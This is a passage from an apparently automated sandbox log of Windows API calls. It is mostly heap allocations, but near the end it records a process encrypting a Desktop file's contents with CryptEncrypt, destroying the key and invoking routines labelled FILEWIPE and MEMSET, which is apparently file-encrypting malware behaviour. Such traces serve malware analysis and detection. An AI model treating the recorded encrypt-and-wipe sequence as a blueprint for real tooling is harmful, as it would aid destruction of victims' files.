hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.913] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.914] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.915] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.917] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.917] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.917] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.917] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.917] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.917] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.918] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.918] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.918] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.918] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.918] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x15b28, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x15b30) returned 1 [0030.918] CharLowerBuffW (in: lpsz="byte[88881]", cchLength=0xb | out: lpsz="byte[88881]") returned 0xb [0030.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.919] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8e1148*, pdwDataLen=0x6ae220*=0x15b28, dwBufLen=0x15b30 | out: pbData=0x8e1148*, pdwDataLen=0x6ae220*=0x15b30) returned 1 [0030.920] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.920] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.920] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.930] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.931] CryptDestroyKey (hKey=0x7c2280) returned 1 [0030.931] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.931] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.932] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0030.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.932] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.933] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca047e90, ftCreationTime.dwHighDateTime=0x1d5bec3, ftLastAccessTime.dwLowDateTime=0xa4c0b630, ftLastAccessTime.dwHighDateTime=0x1d5b838, ftLastWriteTime.dwLowDateTime=0xa4c0b630, ftLastWriteTime.dwHighDateTime=0x1d5b838, nFileSizeHigh=0x0, nFileSizeLow=0x15b28, dwReserved0=0x0, dwReserved1=0x777648, cFileName="seoYHLX7CEV1iLpfdx.avi", cAlternateFileName="SEOYHL~1.AVI")) returned 0x7c2100 [0030.933] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.933] CharLowerBuffW (in: lpsz="byte[88872]", cchLength=0xb | out: lpsz="byte[88872]") returned 0xb [0030.934] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 